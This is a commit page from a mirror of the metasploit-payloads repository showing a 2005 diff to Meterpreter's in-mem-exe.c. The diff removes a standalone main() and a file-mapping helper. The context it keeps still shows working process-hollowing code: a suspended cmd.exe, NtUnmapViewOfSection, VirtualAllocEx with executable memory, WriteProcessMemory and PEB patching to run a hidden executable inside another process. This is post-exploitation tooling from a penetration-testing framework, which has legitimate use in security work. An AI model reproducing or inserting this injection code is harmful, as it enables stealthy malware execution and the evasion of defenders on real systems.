github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-20 14:39:22 +01:00
Code Releases Activity

removed extra stuff

Browse Source 
git-svn-id: file:///home/svn/incoming/trunk@2808 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Matt Miller 2005-07-22 03:37:32 +00:00
parent ef3185398a
commit c1e62905dc
1 changed files with 0 additions and 204 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

204
c/meterpreter/source/extensions/stdapi/server/sys/process/in-mem-exe.c
View File

@ -12,8 +12,6 @@
*/
#include "precomp.h"
#define DUMMY_PROCESS "cmd.exe"
typedef ULONG NTSTATUS;
typedef enum _PROCESSINFOCLASS
{
@ -37,185 +35,11 @@ typedef struct _PROCESS_BASIC_INFORMATION
HANDLE InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
LPVOID MapNewExecutableRaw(
IN LPCSTR ExecutableFilePath);
BOOL MapNewExecutableRegionInProcess(
IN HANDLE TargetProcessHandle,
IN HANDLE TargetThreadHandle,
IN LPVOID NewExecutableRawImage);
int main(
IN int argc,
IN char **argv)
{
PROCESS_INFORMATION ProcessInformation;
STARTUPINFO StartupInformation;
LPVOID NewExecutableRawImage = NULL;
//
// If we lived without initialization we'd be a conglomerate of chaos and
// unpredictability...
//
ZeroMemory(
&StartupInformation,
sizeof(StartupInformation));
ZeroMemory(
&ProcessInformation,
sizeof(ProcessInformation));
StartupInformation.cb = sizeof(StartupInformation);
do
{
//
// Yeah...
//
if (argc == 1)
{
fprintf(stderr, "Usage: %s [executable]\n",
argv[0]);
SetLastError(
ERROR_INVALID_PARAMETER);
break;
}
//
// Map in the raw contents of the executable
//
if (!(NewExecutableRawImage = MapNewExecutableRaw(
argv[1])))
{
fprintf(stderr, "MapNewExecutableRaw failed, %lu.\n",
GetLastError());
break;
}
//
// Run it...
//
if (!CreateProcess(
NULL,
DUMMY_PROCESS,
NULL,
NULL,
FALSE,
CREATE_SUSPENDED,
NULL,
NULL,
&StartupInformation,
&ProcessInformation))
{
fprintf(stderr, "CreateProcess(\"%s\") failed, %lu.\n",
DUMMY_PROCESS,
GetLastError());
break;
}
//
// Unmap the dummy executable and map in the new executable into the
// target process
//
if (!MapNewExecutableRegionInProcess(
ProcessInformation.hProcess,
ProcessInformation.hThread,
NewExecutableRawImage))
{
fprintf(stderr, "MapNewExecutableRegionInProcess failed, %lu.\n",
GetLastError());
break;
}
//
// Resume the thread and let it rock...
//
if (ResumeThread(
ProcessInformation.hThread) == (DWORD)-1)
{
fprintf(stderr, "ResumeThread failed, %lu.\n",
GetLastError());
break;
}
} while (0);
//
// Cleanup
//
if (ProcessInformation.hProcess)
CloseHandle(
ProcessInformation.hProcess);
if (ProcessInformation.hThread)
CloseHandle(
ProcessInformation.hThread);
return GetLastError();
}
//
// Maps the raw contents of the supplied executable image file into the current
// process and returns the address at which the image is mapped.
//
LPVOID MapNewExecutableRaw(
IN LPCSTR ExecutableFilePath)
{
HANDLE FileHandle = NULL;
HANDLE FileMappingHandle = NULL;
LPVOID NewExecutableRawImage = NULL;
do
{
if ((FileHandle = CreateFile(
ExecutableFilePath,
GENERIC_READ,
FILE_SHARE_READ,
NULL,
OPEN_EXISTING,
FILE_FLAG_RANDOM_ACCESS,
NULL)) == INVALID_HANDLE_VALUE)
{
fprintf(stderr, "CreateFile failed, %lu.\n",
GetLastError());
break;
}
if (!(FileMappingHandle = CreateFileMapping(
FileHandle,
NULL,
PAGE_READONLY,
0,
0,
NULL)))
{
fprintf(stderr, "CreateFileMapping failed, %lu.\n",
GetLastError());
break;
}
if (!(NewExecutableRawImage = MapViewOfFile(
FileMappingHandle,
FILE_MAP_READ,
0,
0,
0)))
{
fprintf(stderr, "MapViewOfFile failed, %lu.\n",
GetLastError());
break;
}
} while (0);
if (FileMappingHandle)
CloseHandle(
FileMappingHandle);
if (FileHandle)
CloseHandle(
FileHandle);
return NewExecutableRawImage;
}
//
// Maps the contents of the executable image into the new process and unmaps
// the original executable. All necessary fixups are performed to allow the
@ -265,8 +89,6 @@ BOOL MapNewExecutableRegionInProcess(
TargetThreadHandle,
&ThreadContext))
{
fprintf(stderr, "GetThreadContext failed, %lu.\n",
GetLastError());
break;
}
@ -285,9 +107,6 @@ BOOL MapNewExecutableRegionInProcess(
TargetProcessHandle,
OldEntryPoint)) != ERROR_SUCCESS)
{
fprintf(stderr, "NtUnmapViewOfSection failed, %.8x.\n",
Status);
SetLastError(ERROR_INVALID_ADDRESS);
break;
}
@ -301,11 +120,7 @@ BOOL MapNewExecutableRegionInProcess(
if (!SetThreadContext(
TargetThreadHandle,
&ThreadContext))
{
fprintf(stderr, "SetThreadContext failed, %lu.\n",
GetLastError());
break;
}
//
// Allocate storage for the new executable in the child process
@ -316,11 +131,7 @@ BOOL MapNewExecutableRegionInProcess(
NtHeader->OptionalHeader.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE)))
{
fprintf(stderr, "VirtualAllocEx failed, %lu.\n",
GetLastError());
break;
}
//
// Update the executable's image base address in the PEB...
@ -336,11 +147,7 @@ BOOL MapNewExecutableRegionInProcess(
&BasicInformation,
sizeof(BasicInformation),
&SizeOfBasicInformation) != ERROR_SUCCESS)
{
fprintf(stderr, "NtQueryInformationProcess failed, %lu.\n",
GetLastError());
break;
}
ProcessPeb = BasicInformation.PebBaseAddress;
@ -350,11 +157,7 @@ BOOL MapNewExecutableRegionInProcess(
(LPVOID)&NtHeader->OptionalHeader.ImageBase,
sizeof(LPVOID),
NULL))
{
fprintf(stderr, "WriteProcessMemory(ImageBaseAddress) failed, %lu.\n",
GetLastError());
break;
}
//
// Copy the image headers and all of the section contents
@ -365,11 +168,7 @@ BOOL MapNewExecutableRegionInProcess(
NewExecutableRawImage,
NtHeader->OptionalHeader.SizeOfHeaders,
NULL))
{
fprintf(stderr, "WriteProcessMemory(Headers) failed, %lu.\n",
GetLastError());
break;
}
Success = TRUE;
@ -387,9 +186,6 @@ BOOL MapNewExecutableRegionInProcess(
SectionHeader[SectionIndex].SizeOfRawData,
NULL))
{
fprintf(stderr, "WriteProcessMemory(Section) failed, %lu.\n",
GetLastError());
Success = FALSE;
break;
}